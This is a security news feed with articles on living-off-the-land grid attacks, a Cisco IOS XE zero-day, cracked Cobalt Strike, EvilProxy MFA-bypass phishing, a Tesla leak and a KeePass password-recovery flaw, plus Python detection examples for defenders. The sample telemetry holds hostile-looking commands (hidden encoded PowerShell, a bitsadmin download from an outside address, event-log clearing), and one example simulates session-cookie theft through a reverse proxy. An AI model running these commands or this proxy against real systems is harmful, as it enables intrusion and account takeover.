Forensics – Information Security Newspaper | Hacking News
https://www.securitynewspaper.com

How Living-off-the-land (LotL) technique is used to hack into power grids & cause power outages
https://www.securitynewspaper.com/2023/11/10/how-living-off-the-land-lotl-technique-is-used-to-hack-into-power-grids-cause-power-outages/ Fri, 10 Nov 2023 22:27:24 +0000
Living-off-the-land (LotL) techniques in cyber attacks refer to the use of legitimate, native tools already present in the target system to carry out malicious activities. This approach is particularly stealthy because it leverages tools and processes that are typically trusted and thus less likely to raise alarms. In the context of Operational Technology (OT) or Industrial Control Systems (ICS), such attacks can be especially dangerous due to the critical nature of the systems involved. Here’s how such an attack might work, with examples:

1. Initial Access

  • Example: A phishing email is sent to an employee in the OT/ICS environment. The email carries a seemingly harmless document whose macro, once enabled, launches PowerShell (a native Windows tool) to set up a backdoor, so no foreign executable has to be dropped at this stage.

2. Lateral Movement

  • Example: Once inside the network, attackers might use legitimate system administration tools like Windows Management Instrumentation (WMI) or Remote Desktop Protocol (RDP) to move laterally across the network, searching for critical OT/ICS components.

3. Elevation of Privileges

  • Example: Attackers might use built-in tools such as netstat or netsh to learn which services are listening and how the host firewall is configured, then use other native commands (for example netsh advfirewall, sc or schtasks) to weaken those defenses or to abuse a misconfigured service or scheduled task so that their code runs with higher privileges.

4. Discovery and Information Gathering

  • Example: Tools like Tasklist or Systeminfo (native to Windows) are used to gather information about the system, such as running processes, installed software, or network configurations relevant to the OT/ICS environment.

5. Exploitation and Manipulation

  • Example: In an ICS environment, attackers might use standard industrial communication protocols like Modbus or DNP3 (which are legitimate and essential for normal operations) to send malicious commands to control systems, potentially disrupting physical processes like power generation or water treatment. These protocols typically carry no authentication, so a write or control command is accepted from any host that can reach the controller; nothing about the command itself is malformed, which is why protocol-aware monitoring has to judge it by context (which host sent it, when, and whether an operator action explains it).

6. Persistence and Exfiltration

  • Example: Attackers could use standard data transfer tools like FTP or even Windows BITS (Background Intelligent Transfer Service) to exfiltrate stolen data, or to maintain persistence by regularly updating malware or downloading additional tools.

7. Cleanup

  • Example: To erase their tracks, attackers might use native utilities to delete logs or other evidence, for instance wevtutil cl or the PowerShell cmdlet Clear-EventLog to clear Windows event logs, making detection and forensics much more difficult. Forwarding logs to a collector as they are written is the usual countermeasure: the earlier events survive on the collector and the clearing itself is recorded there (Security event 1102).
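The seven phases above are what a detection engineer turns into rules over process-creation telemetry. The following is an added example for this article, not code from the original page or from any vendor: it runs a handful of LotL rules over Windows process-creation events (Security 4688 or Sysmon event 1, already parsed into dicts with field names chosen here, not the event XML schema). The events, hostnames, addresses (documentation ranges) and the thresholds are constructed assumptions.

```python
"""Flag living-off-the-land activity in Windows process-creation events.
Added example for this article; events and thresholds are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RECON_TOOLS = {"tasklist.exe", "systeminfo.exe", "netstat.exe", "whoami.exe", "net.exe"}

# Command-line patterns for native tools used the way the phases above describe.
RULES = [
    ("encoded_or_hidden_powershell",
     re.compile(r"powershell.*?(?:\s-e(?:nc(?:odedcommand)?)?\s|-w(?:indowstyle)?\s+hidden"
                r"|downloadstring|\biex\b)", re.I)),
    ("wmi_remote_process_create",
     re.compile(r"wmic(?:\.exe)?\s.*?/node:.*?process\s+call\s+create", re.I)),
    ("bits_transfer",
     re.compile(r"bitsadmin(?:\.exe)?\s.*?/transfer|start-bitstransfer", re.I)),
    ("event_log_cleared",
     re.compile(r"(?:wevtutil(?:\.exe)?\s+cl\b|clear-eventlog)", re.I)),
]

def _image_name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect_lotl(events, recon_window=timedelta(minutes=2), recon_min_tools=3):
    """Return (host, rule, command_line) alerts in event-time order."""
    alerts = []
    recon_history = defaultdict(list)          # (host, user) -> [(time, tool)]
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        image, parent = _image_name(ev["image"]), _image_name(ev["parent"])
        cmd = ev["cmdline"]
        # Initial access: an Office document that spawns a scripting host.
        if parent in OFFICE_APPS and image in SHELLS:
            alerts.append((ev["host"], "office_spawned_shell", cmd))
        for rule, rx in RULES:
            if rx.search(cmd):
                alerts.append((ev["host"], rule, cmd))
        # Discovery: several different recon tools by one user within a short window.
        if image in RECON_TOOLS:
            key = (ev["host"], ev["user"])
            recent = [(t, tool) for t, tool in recon_history[key] if when - t <= recon_window]
            before = {tool for _, tool in recent}
            recent.append((when, image))
            recon_history[key] = recent
            after = before | {image}
            if len(before) < recon_min_tools <= len(after):   # fire once, when the threshold is crossed
                alerts.append((ev["host"], "discovery_burst", ",".join(sorted(after))))
    return alerts

def _ev(time, host, user, parent, image, cmdline):
    return {"time": time, "host": host, "user": user, "parent": parent,
            "image": image, "cmdline": cmdline}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
S32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed telemetry for one engineering workstation, not real data
    _ev("2023-10-10T08:01:05", "eng-ws-07", r"corp\jdoe",
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", PS,
        "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    _ev("2023-10-10T08:01:40", "eng-ws-07", r"corp\jdoe", PS, S32 + r"\tasklist.exe", "tasklist /v"),
    _ev("2023-10-10T08:02:10", "eng-ws-07", r"corp\jdoe", PS, S32 + r"\systeminfo.exe", "systeminfo"),
    _ev("2023-10-10T08:02:35", "eng-ws-07", r"corp\jdoe", PS, S32 + r"\NETSTAT.EXE", "netstat -ano"),
    _ev("2023-10-10T08:05:00", "eng-ws-07", r"corp\jdoe", S32 + r"\cmd.exe", S32 + r"\wbem\WMIC.exe",
        r'wmic.exe /node:scada-eng-02 /user:corp\svc_ops process call create "cmd.exe /c whoami"'),
    _ev("2023-10-10T08:06:30", "eng-ws-07", r"corp\jdoe", S32 + r"\cmd.exe", S32 + r"\bitsadmin.exe",
        r"bitsadmin.exe /transfer upd /download /priority high http://203.0.113.10/t.bin C:\Users\Public\t.bin"),
    _ev("2023-10-10T08:09:00", "eng-ws-07", r"corp\jdoe", S32 + r"\cmd.exe", S32 + r"\wevtutil.exe",
        "wevtutil.exe cl Security"),
    _ev("2023-10-10T09:30:00", "fin-ws-12", r"corp\asmith", r"C:\Windows\explorer.exe", PS,
        "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users\\asmith\\Documents"),
]

if __name__ == "__main__":
    for host, rule, cmd in detect_lotl(SAMPLE_EVENTS):
        print(f"{host:10} {rule:30} {cmd[:60]}")
```

The point of the discovery rule is that no single recon command is suspicious; three different ones from the same user inside two minutes, launched from a PowerShell that an Office document spawned, is. The ordinary administrative PowerShell on the second workstation produces nothing.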

In late 2022, a significant cyber-physical incident occurred in Ukraine, attributed to the Russia-linked threat actor Sandworm. This event targeted Ukrainian critical infrastructure and utilized a multi-event cyber attack strategy, incorporating innovative techniques to impact industrial control systems (ICS) and operational technology (OT). The Sandworm actor employed OT-level living-off-the-land (LotL) techniques, likely causing a substation’s circuit breakers to trip and resulting in an unplanned power outage. This outage coincided with mass missile strikes across Ukraine’s critical infrastructure. Additionally, Sandworm executed a second disruptive event by deploying a new variant of CADDYWIPER malware in the victim’s IT environment.

This attack exemplifies the latest advancements in Russia’s cyber-physical attack capabilities, particularly visible since Russia’s invasion of Ukraine. The techniques used indicate a maturing offensive OT arsenal, capable of identifying novel OT threat vectors, developing new capabilities, and leveraging various types of OT infrastructure for attacks. Utilizing LotL techniques likely reduced the time and resources required for the cyber-physical attack. Although the initial intrusion point remains undetermined, the rapid development of the OT component of this attack suggests the actor’s ability to swiftly create similar capabilities against other OT systems globally.

Sandworm, active since at least 2009, is a versatile threat actor conducting espionage, influence, and attack operations, primarily supporting Russia’s Main Intelligence Directorate (GRU). The group’s primary focus has been Ukraine, where it has orchestrated disruptive and destructive attacks using wiper malware, especially during Russia’s re-invasion in 2022. However, Sandworm’s activities extend globally, underlining the Russian military’s extensive ambitions and interests in various regions. The group’s global threat activity and novel OT capabilities necessitate proactive measures from OT asset owners to mitigate potential risks.

According to Mandiant's research, the intrusion began in or before June 2022 and culminated in two disruptive events, on October 10 and 12. Sandworm reached the OT environment through a hypervisor that hosted a SCADA management instance for a substation, and may have had access to the SCADA system for up to three months before acting. On October 10 the actor used an optical disc image named “a.iso” to run a native MicroSCADA binary, most likely to issue the control commands that tripped the substation's circuit breakers. In plain terms: the attackers got into the software that supervises how the substation operates, sat inside it undetected for as long as three months, and then made the substation's own control software do the switching for them. That is what OT-level living off the land means: no ICS-specific malware had to be written, only the commands the system already understands.

This case underscores the evolving nature of cyber threats, particularly in critical infrastructure sectors. The increasing sophistication and rapid development of such attacks highlight the need for enhanced cybersecurity measures, continuous monitoring, and preparedness against novel and complex cyber threats in OT and ICS environments.

In OT/ICS environments, such LotL attacks are particularly concerning because they:

  • Are harder to detect due to the use of legitimate tools.
  • Can cause significant physical and operational damage.
  • May bypass traditional security measures that don’t account for malicious use of native tools.

Defending against such attacks requires a combination of robust cybersecurity practices: employee training, network segmentation between IT and OT, constant monitoring for anomalous behaviour (command-line logging for native tools such as PowerShell, WMI and BITS on the IT side; a baseline of normal protocol traffic and control commands on the OT side, so that an unexpected write or breaker operation stands out), and regular updating and patching of all systems.

Cisco’s Ticking Time Bomb: CVE-2023-20198 with CVSS Score 10 Hits Cisco Devices
https://www.securitynewspaper.com/2023/10/16/ciscos-ticking-time-bomb-cve-2023-20198-with-cvss-score-10-hits-cisco-devices/ Mon, 16 Oct 2023 22:55:44 +0000
Cisco IOS XE is a robust and flexible operating system, optimized for the evolving landscape of enterprise networking and technology. It enables model-driven programmability, application hosting, and automated configuration management, thus simplifying many day-to-day tasks. IOS XE is integral in providing consistency across Cisco’s array of switching, routing, and wireless network devices.

The Vulnerability: CVE-2023-20198


A critical zero-day vulnerability has emerged, tracked as CVE-2023-20198. It carries the maximum severity rating of CVSS 10, affects devices running Cisco IOS XE software with the web UI feature enabled, and at the time of writing has no patch, leaving systems exposed. The flaw lets an unauthenticated, remote attacker create an account with privilege level 15 (the highest) on the device, and with it full control of the system.

Exploitation in the Wild
Attackers have already begun exploiting this vulnerability in the wild, utilizing it to deliver malicious implants. Organizations using the affected devices are advised to apply mitigation measures promptly to defend against these exploits.

Affected Devices and Systems
The vulnerability, CVE-2023-20198, affects all Cisco IOS XE devices that have the web UI feature enabled (by the ip http server and/or ip http secure-server commands), especially when that interface is exposed to the internet or untrusted networks. To ascertain if a system is vulnerable, administrators should:

  1. Run show running-config | include ip http server|secure|active and check for ip http server or ip http secure-server in the global configuration; either one means the web UI is enabled.
  2. Look for ip http active-session-modules none and ip http secure-active-session-modules none. If the first is present, the vulnerability is not exploitable over HTTP; if the second is present, it is not exploitable over HTTPS. Without those lines, the web UI is reachable over that transport and the device is exploitable.

Cisco’s Response
Cisco has acknowledged the vulnerability, confirming its presence in devices running the Cisco IOS XE software. The company provided steps to identify affected systems and noted the following Indicators of Compromise (IoCs):

  1. System logs containing messages indicating programmatic configuration by unfamiliar users, such as:
  • %SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http from console as user on line.
  • %SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: user] [Source: source_IP_address].
  2. System logs containing messages about unknown file installation actions, like:
  • %WEBUI-6-INSTALL_OPERATION_INFO: User: username, Install Operation: ADD filename.
  3. Presence of an implant, checked by issuing the following command from a workstation with access to the affected system:
  • curl -k -X POST "https://systemip/webui/logoutconfirm.html?logon_hash=1", if a hexadecimal string is returned, the implant is present.
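With many devices to check, the configuration test and the three log indicators above are worth scripting against saved show running-config output and exported syslog. The following is an added example for this article, not Cisco's or Talos's code: the configuration excerpt and syslog lines are constructed (addresses from documentation ranges), the exact position of the user name in the CONFIG_P message is assumed from the placeholder text Cisco published, and the known_users allow-list is this example's own idea rather than part of Cisco's guidance.

```python
"""CVE-2023-20198 exposure and indicator checks over saved device output.
Added example for this article; config and log samples are constructed."""
import re

def webui_exposure(running_config):
    """Mirror the two configuration checks: is the web UI listening on HTTP and/or
    HTTPS, and does an active-session-modules none line make that transport safe?"""
    lines = {ln.strip() for ln in running_config.splitlines()}
    http_on = "ip http server" in lines
    https_on = "ip http secure-server" in lines
    return {
        "http_exploitable": http_on and "ip http active-session-modules none" not in lines,
        "https_exploitable": https_on and "ip http secure-active-session-modules none" not in lines,
    }

# The three log indicators from the advisory, with the interesting fields captured.
IOC_PATTERNS = [
    ("programmatic_config_by_webui",
     re.compile(r"%SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http"
                r" from console as (?P<user>\S+)")),
    ("webui_login",
     re.compile(r"%SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success \[user: (?P<user>[^\]]+)\]"
                r" \[Source: (?P<src>[^\]]+)\]")),
    ("webui_install",
     re.compile(r"%WEBUI-6-INSTALL_OPERATION_INFO: User: (?P<user>[^,]+),"
                r" Install Operation: ADD (?P<file>\S+)")),
]

def scan_syslog(lines, known_users=("netadmin",)):
    """Return (indicator, fields, line) for each matching line. Web UI logins by
    accounts the operator expects are skipped (an assumption of this example)."""
    hits = []
    for line in lines:
        for name, rx in IOC_PATTERNS:
            m = rx.search(line)
            if m and not (name == "webui_login" and m.group("user") in known_users):
                hits.append((name, m.groupdict(), line))
    return hits

def implant_present(response_body):
    """Interpret the body returned by
    curl -k -X POST "https://<ip>/webui/logoutconfirm.html?logon_hash=1".
    Cisco says a hexadecimal string means the implant answered; assumed here to
    mean the body consists of nothing but hex digits."""
    return re.fullmatch(r"[0-9a-fA-F]+", response_body.strip()) is not None

SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
ip http server
ip http secure-server
ip http secure-active-session-modules none
!
line vty 0 4
 transport input ssh
"""

SAMPLE_SYSLOG = [  # constructed, modelled on the message formats quoted in the advisory
    "Oct 16 09:12:01.113: %SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: netadmin] [Source: 10.0.0.5]",
    "Oct 16 09:40:17.502: %SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: svc_webui] [Source: 203.0.113.77]",
    "Oct 16 09:40:19.004: %SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http"
    " from console as svc_webui on line 0",
    "Oct 16 09:41:02.339: %WEBUI-6-INSTALL_OPERATION_INFO: User: svc_webui, Install Operation: ADD payload.pkg",
    "Oct 16 09:45:00.000: %SYS-5-CONFIG_I: Configured from console by netadmin on vty0 (10.0.0.5)",
]

if __name__ == "__main__":
    print(webui_exposure(SAMPLE_CONFIG))
    for name, fields, _ in scan_syslog(SAMPLE_SYSLOG):
        print(name, fields)
```

In the sample the device has both servers enabled, but only HTTP is still exploitable because secure-active-session-modules none has been applied. The login from the unknown svc_webui account, followed within seconds by a programmatic configuration change and a package install, is the sequence the advisory describes; the netadmin login is deliberately allow-listed so that it does not drown the real hit.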

Cisco, alongside other cybersecurity firms like Tenable, has provided plugins to identify affected systems. While awaiting a patch, these plugins and the aforementioned checks can assist in identifying and mitigating unauthorized access attempts.


CVE-2023-20198 poses a significant threat to cybersecurity due to its maximum severity rating and the absence of a patch. Organizations using affected Cisco IOS XE devices should remain vigilant and apply necessary mitigation measures to safeguard their systems from potential exploits.

The post Cisco’s Ticking Time Bomb: CVE-2023-20198 with CVSS Score 10 Hits Cisco Devices appeared first on Information Security Newspaper | Hacking News.

]]>
Unmasking Cracked Cobalt Strike 4.9: The Cybercriminal’s Tool of Choice https://www.securitynewspaper.com/2023/10/10/unmasking-cracked-cobalt-strike-4-9-the-cybercriminals-tool-of-choice/ Tue, 10 Oct 2023 17:56:11 +0000 https://www.securitynewspaper.com/?p=27286 Cobalt Strike, a legitimate commercial penetration testing tool, has inadvertently become a favored instrument among cybercriminals for its efficacy in infiltrating network security. Initially released in 2012 by Fortra (formerlyRead More →

The post Unmasking Cracked Cobalt Strike 4.9: The Cybercriminal’s Tool of Choice appeared first on Information Security Newspaper | Hacking News.

]]>

Cobalt Strike, a legitimate commercial penetration testing tool, has become a favored instrument among cybercriminals because of how effective it is at running post-exploitation operations inside a compromised network. Created by Raphael Mudge and first released in 2012, it is now sold by Fortra (formerly HelpSystems), which acquired it in 2020. It was designed to help red teams emulate adversaries and identify weaknesses in organizational infrastructures. Despite customer screening and licensing for lawful use only, malicious actors have obtained and distributed cracked versions, making it a prevalent tool in attacks involving data theft and ransomware.

Cobalt Strike 4.9 is now available. This release sees an overhaul to Cobalt Strike’s post exploitation capabilities to support user defined reflective loaders (UDRLs), the ability to export Beacon without a reflective loader which adds official support for prepend-style UDRLs, support for callbacks in a number of built-in functions, a new in-Beacon data store and more.  

Cobalt Strike 4.9 Features

The latest release, version 4.9, introduces several significant features and improvements:

  • User-Defined Reflective Loaders (UDRLs): This feature enhances post-exploitation capabilities by allowing users to define and use their reflective loaders, providing more flexibility and control over the loading process of the Beacon payload.
  • Export Beacon Without a Loader: Users can now export the Beacon payload without a reflective loader, which officially supports prepend-style UDRLs, allowing for more versatile deployment and execution of the Beacon payload in various environments.
  • Callback Support: Version 4.9 introduces support for callbacks, enabling users to implement and handle custom callback routines effectively.
  • Beacon User Data Structures Improvement: These structures have been improved to prevent crashes and provide more stability during operations. They also allow a Reflective Loader to resolve and pass system call information to Beacon, overriding Beacon’s default system call resolver.
  • Host Profile Support for HTTP(S) Listeners: This feature addresses limitations in HTTP(S) processing by introducing a new Malleable C2 profile group named http-host-profiles.
  • WinHTTP Support: The update adds support for the WinHTTP library to the Beacon’s HTTP(S) listener.
  • Beacon Data Store: This feature allows users to keep Beacon Object Files (BOFs) and .NET assemblies in Beacon's memory in a structured manner, so they are sent once and can be run repeatedly without being transferred again.

Cracked Versions in the Wild

Google researchers have recently identified 34 different cracked versions of the Cobalt Strike hacking toolkit actively being used in the wild. These cracked versions are exploited by cybercriminals for various malicious activities, emphasizing the tool’s popularity and widespread illicit use in the cybercriminal community. The discovery of cracked version 4.9 of Cobalt Strike highlights the significant challenges and risks associated with the illicit use of this powerful toolkit.

The Crackdown

Microsoft, in collaboration with Fortra and the Health Information Sharing and Analysis Center (Health-ISAC), has initiated a widespread legal crackdown on servers hosting these cracked copies. This concerted effort aims to dismantle the malicious infrastructure and disrupt the operations of threat actors utilizing Cobalt Strike for nefarious purposes.

Why Cobalt Strike?

Cobalt Strike has gained notoriety among cybercriminals for its post-exploitation capabilities. Once the beacons are deployed, these provide persistent remote access to compromised devices, allowing for sensitive data harvesting or the dropping of additional malicious payloads.

The Users

Cobalt Strike’s cracked versions are used by unidentified criminal groups, state-backed threat actors, and hacking groups acting on behalf of foreign governments. These actors have been linked to numerous ransomware attacks impacting various industries, causing significant financial and operational damage.

Remediation Efforts

To counteract the malicious use of Cobalt Strike, various entities have provided resources to assist network defenders in identifying Cobalt Strike components within their networks. These resources include open-sourced YARA rules and a collection of indicators of compromise (IOCs).
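Besides YARA rules for Beacon in memory, one of the oldest network-side indicators is the checksum8 test on staging URIs: stagers fetch their payload from a path whose byte sum modulo 256 is a fixed value (92 for the x86 stager, shared with Metasploit's Windows stager, 93 for the x64 Cobalt Strike stager). The following is an added example for this article, not Fortra's, Google's or Microsoft's tooling; the request lines are constructed, and the four-alphanumeric path-shape filter is this example's own false-positive control, based on the default stager URI shape.

```python
"""checksum8 test for stager URIs in HTTP request logs.
Added example for this article; request lines are constructed."""
import re

# Values the stagers use: 92 is the x86 stager (also Metasploit's Windows stager), 93 the x64 one.
STAGER_CHECKSUMS = {92: "x86 stager", 93: "x64 stager"}

def checksum8(uri_path):
    """Sum of the byte values of the path with its leading '/' removed, modulo 256."""
    return sum(uri_path.lstrip("/").encode("latin-1")) % 256

def classify_uri(uri_path):
    """Return a verdict string for a stager-looking path, or None."""
    path = uri_path.split("?", 1)[0]
    kind = STAGER_CHECKSUMS.get(checksum8(path))
    if kind is None:
        return None
    # Two of every 256 random paths hit one of the checksums by chance, so the
    # default stager shape (four random alphanumerics, no extension) is required
    # for a strong verdict; anything else is reported as weak.
    if re.fullmatch(r"/[A-Za-z0-9]{4}", path):
        return kind
    return f"{kind} (weak: path shape unusual)"

def flag_requests(request_lines):
    """Return [(path, verdict)] for GET request lines whose URI looks like a stager fetch."""
    out = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2 or parts[0] != "GET":
            continue
        verdict = classify_uri(parts[1])
        if verdict:
            out.append((parts[1], verdict))
    return out

if __name__ == "__main__":
    sample = ["GET /aab9 HTTP/1.1", "GET /index.html HTTP/1.1", "GET /aaaaaw HTTP/1.1"]
    print(flag_requests(sample))
```

Treat a hit as a lead, not a conviction: the checksum is cheap to compute at line rate over proxy logs, but the confirmation is the response, a few hundred kilobytes of stageless-looking binary coming back for a four-character path.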

The illicit use of Cobalt Strike poses a significant threat to global cybersecurity. The ongoing crackdown led by Microsoft, Fortra, and Health-ISAC represents a crucial step towards mitigating the risks associated with Cobalt Strike, underscoring the importance of collaborative efforts in the fight against cybercrime.

How $400 toolkit EvilProxy was used to send 120k phishing emails to hundreds of companies
https://www.securitynewspaper.com/2023/08/09/how-400-toolkit-evilproxy-was-used-to-send-120k-phishing-emails-to-hundreds-of-companies/ Wed, 09 Aug 2023 22:15:33 +0000
Researchers have discovered that malicious actors have been utilizing the phishing toolkit EvilProxy to gain control of cloud-based Microsoft 365 accounts belonging to leaders at well-known firms. These accounts are used to access sensitive company data.

According to a study on the events that was published on Wednesday by the cybersecurity company Proofpoint, the attacks demonstrated both the ubiquity of pre-packaged phishing-as-a-service toolkits as well as the increasing bypassing of multi-factor authentication in order to get access to accounts.

It was discovered that EvilProxy was sending 120,000 phishing emails to more than a hundred different companies in an attempt to obtain Microsoft 365 credentials. In the last five months, Proofpoint has seen a concerning increase in the number of successful compromises of cloud account credentials. The vast majority of the attacks were directed against high-ranking officials. According to the researchers’ estimates, the campaign targeted more than one hundred firms throughout the world, which had a total of one and a half million workers.

There were around 39% C-level executives among the victims, 17% of whom were Chief Financial Officers, and 9% of whom were Presidents and CEOs.

At least 35% of all users whose accounts were compromised in the previous year had MFA enabled, which the researchers found to be a substantial rise in account takeovers among tenants that had MFA protection.

The threat actors, operating at a very large scale, relied heavily on brand impersonation, evasion strategies, and a multi-step infection chain in which traffic was bounced through open redirectors on legitimate websites before landing on the phishing page.

Researchers from Resecurity first documented the Phishing-as-a-Service (PhaaS) platform known as EvilProxy in September 2022. It was offered on the dark web; according to some reports it also goes by the name Moloch, which may link it to a phishing kit built by well-known underground actors who previously targeted financial institutions and the e-commerce industry. As of autumn 2022 the bundle could be purchased anonymously on the dark web for around four hundred dollars.

According to experts, EvilProxy defeats two-factor authentication with a reverse proxy and cookie injection: the phishing site is a proxy that sits between the victim and the real login page, relays every request and response (including the MFA prompt, which the victim answers), and captures the session cookie the service issues once authentication succeeds. The attacker then injects that cookie into their own browser and is logged in as the victim without needing the password or a second factor of their own. These tactics were previously seen in the targeted campaigns of APT and cyberespionage groups; productized in EvilProxy, they are available to anyone paying the subscription, which is why the threat to online services and MFA-protected accounts has grown.
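The exchange described above, as an added example that is not part of the original article and not EvilProxy's code: a stand-in identity provider that wants a password and a one-time code, a reverse proxy the victim actually connects to, and the attacker replaying the captured cookie. Every host, account, cookie and address is constructed (documentation IP ranges) and nothing touches the network. The session-from-a-new-address check at the end is a common defender heuristic added here, not something the article describes.

```python
"""Reverse-proxy (adversary-in-the-middle) MFA bypass, modelled in-process.
Added example for this article; all parties and values are constructed."""
import secrets

class IdentityProvider:
    """Stand-in for the cloud login service: password + one-time code, then a session cookie."""
    def __init__(self):
        self.users = {"cfo@example.test": ("correct horse battery", "492816")}
        self.sessions = {}      # cookie value -> (user, client address seen at login)

    def login(self, req):
        if self.users.get(req["user"]) != (req["password"], req["otp"]):
            return {"status": 401, "body": "invalid credentials"}
        token = secrets.token_hex(16)
        self.sessions[token] = (req["user"], req["client_ip"])
        return {"status": 302, "set_cookie": f"session={token}", "location": "/mail"}

    def fetch(self, req):
        token = req.get("cookie", "").removeprefix("session=")
        if token not in self.sessions:
            return {"status": 401, "body": "login required"}
        user, _ = self.sessions[token]
        return {"status": 200, "body": f"mailbox of {user}"}

    def sessions_used_from_new_ip(self, access_log):
        """Defender-side check: cookies presented from an address other than the one
        they were issued to. Returns the affected user names, sorted."""
        return sorted({self.sessions[c][0] for c, ip in access_log
                       if c in self.sessions and self.sessions[c][1] != ip})

class PhishingReverseProxy:
    """The lookalike host the victim connects to. It forwards each request to the real
    service unchanged and keeps a copy of whatever comes back."""
    def __init__(self, upstream, own_ip):
        self.upstream, self.own_ip, self.captured = upstream, own_ip, []

    def login(self, req):
        forwarded = dict(req, client_ip=self.own_ip)   # the real service sees the proxy's address
        resp = self.upstream.login(forwarded)          # password *and* OTP are relayed as typed
        if "set_cookie" in resp:
            self.captured.append({"user": req["user"], "password": req["password"],
                                  "cookie": resp["set_cookie"]})
        return resp                                    # the victim gets the genuine redirect

def run_attack():
    idp = IdentityProvider()
    proxy = PhishingReverseProxy(idp, own_ip="198.51.100.7")
    # Victim, lured by the phishing mail, types password and the current OTP into the proxied page.
    victim = proxy.login({"user": "cfo@example.test", "password": "correct horse battery",
                          "otp": "492816", "client_ip": "192.0.2.44"})
    # Attacker replays the captured cookie from elsewhere; no password or OTP is needed any more.
    stolen = proxy.captured[0]["cookie"]
    attacker = idp.fetch({"cookie": stolen, "client_ip": "203.0.113.9"})
    access_log = [(stolen.removeprefix("session="), "203.0.113.9")]
    return {"victim_status": victim["status"], "attacker": attacker,
            "hijacked_users": idp.sessions_used_from_new_ip(access_log)}

if __name__ == "__main__":
    print(run_attack())
```

Nothing in the one-time code stops this, because the code is relayed to the real service within its validity window. What does stop it is a credential bound to the origin the browser is actually talking to, such as a FIDO2/WebAuthn authenticator, whose signature over the proxy's hostname is rejected by the real service.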

Want to own a tesla or already own one, check this massive confidential data breach of Tesla
https://www.securitynewspaper.com/2023/05/27/want-to-own-a-tesla-or-already-own-one-check-this-massive-confidential-data-of-tesla-customers/ Sat, 27 May 2023 19:03:33 +0000
The research that was published in the German daily Handelsblatt said that customers of Tesla Inc. lodged over 2,400 complaints about difficulties with self-acceleration and 1,500 complaints regarding issues with brakes between the years of 2015 and March 2022.

According to reports, a large data dump based on internal Tesla documents obtained by a whistleblower suggests that problems with Tesla's driver-assistance systems may be considerably more frequent than regulators and the media have indicated.

According to information that was taken from Tesla’s information technology (IT) system, complaints against these Full Self Driving (FSD) capabilities originated from all over the globe, including the United States of America, Europe, and Asia.

Particularly, in an article titled “My autopilot almost killed me,” Handelsblatt reported receiving 100 terabytes of data and 23,000 files. Within those files were 3,000 entries highlighting consumers’ safety concerns and tales of more than 1,000 crashes.

The publisher included a note stating that the data includes the phone numbers of customers.

According to the hundreds of clients that Handelsblatt is claimed to have contacted, the fears were quite serious.

According to one man from Michigan, his Tesla “suddenly braked hard, as hard as you can imagine.” When I was ordered to fasten my seatbelt, the vehicle was on the verge of coming to a complete halt. I was then struck by a second car.

The files were shown to the Fraunhofer Institute for Secure Information Technology by Handelsblatt. The institute concluded that there is no reason to presume that “the data set does not come from IT systems belonging to or in the environment of Tesla.”

Employees are instructed that, unless lawyers are involved, they should not deliver written comments but should convey them “VERBALLY to the customer.”

The post quotes the instructions as saying, “Do not copy and paste the report below into an email, text message, or leave it in a voicemail to the customer,” and it is clear that this is a requirement.

A report featured a doctor from California who said that her Tesla accelerated on its own in the autumn of 2021 and smashed into two concrete pillars. She noted that the company never sent emails and that everything was always communicated verbally.

According to the attorneys for Tesla, the news organization is required to provide a copy of the data to Tesla, and all other copies of the data must be destroyed. The attorneys for Tesla also warned legal action “for the theft of confidential and personal data.”

According to reports, the alleged papers would undoubtedly be important to current wrongful death lawsuits made against Tesla. These claims assert that the company’s technology has significant safety faults. Additionally, they may compel local, state, and federal authorities to take action.

Brandenburg's data protection officer, Dagmar Hartge, recognized the seriousness of the allegations and pointed out that, should they prove accurate, the data breach would have significant repercussions on a worldwide scale. The case has been passed to privacy regulators in the Netherlands so that additional investigation can be conducted.

“Tesla takes the protection of its proprietary and confidential information, as well as the privacy of its employees and customers, very seriously. We intend to initiate legal proceedings against this individual for his theft of Tesla's confidential information and employees' personal data,” Tesla said in a statement reported by the publication.

The Chinese regulatory authorities have already started to take action. Approximately two weeks ago, Tesla was forced to provide an emergency software update for the majority of the automobiles it has sold in China as a direct result of problems with unexpected and sudden acceleration.

Since 2016, Musk has made many claims that his self-driving vehicles would be really autonomous, but he has not delivered on those claims.

Hack KeePass – Extract KeePass master password from Memory using this tool
https://www.securitynewspaper.com/2023/05/16/hack-keepass-extract-keepass-master-password-from-memory-using-this-tool/ Tue, 16 May 2023 14:03:00 +0000
KeePass is a piece of software that is both open-source and free to use. It is a trusted companion for users of Windows, Linux, and Mac OS X, as well as users of mobile devices. However, a newly found security hole has brought attention to the program, demonstrating that not even the most secure of systems are immune to the possibility of having security problems.

This security flaw, tracked as CVE-2023-32784, makes it possible to recover the user's master password from memory even when the workspace is locked or the program is no longer running. The master password is the main key that unlocks the user's password database. An attacker with a memory dump can extract the master password in clear text, minus its first character. KeePass 2.x versions prior to 2.54 are affected. The dump can be a dump of the KeePass process, but also a swap (page) file, a hibernation file, or a RAM dump of the whole system. The fact that the first character cannot be reconstructed is the only minor consolation.

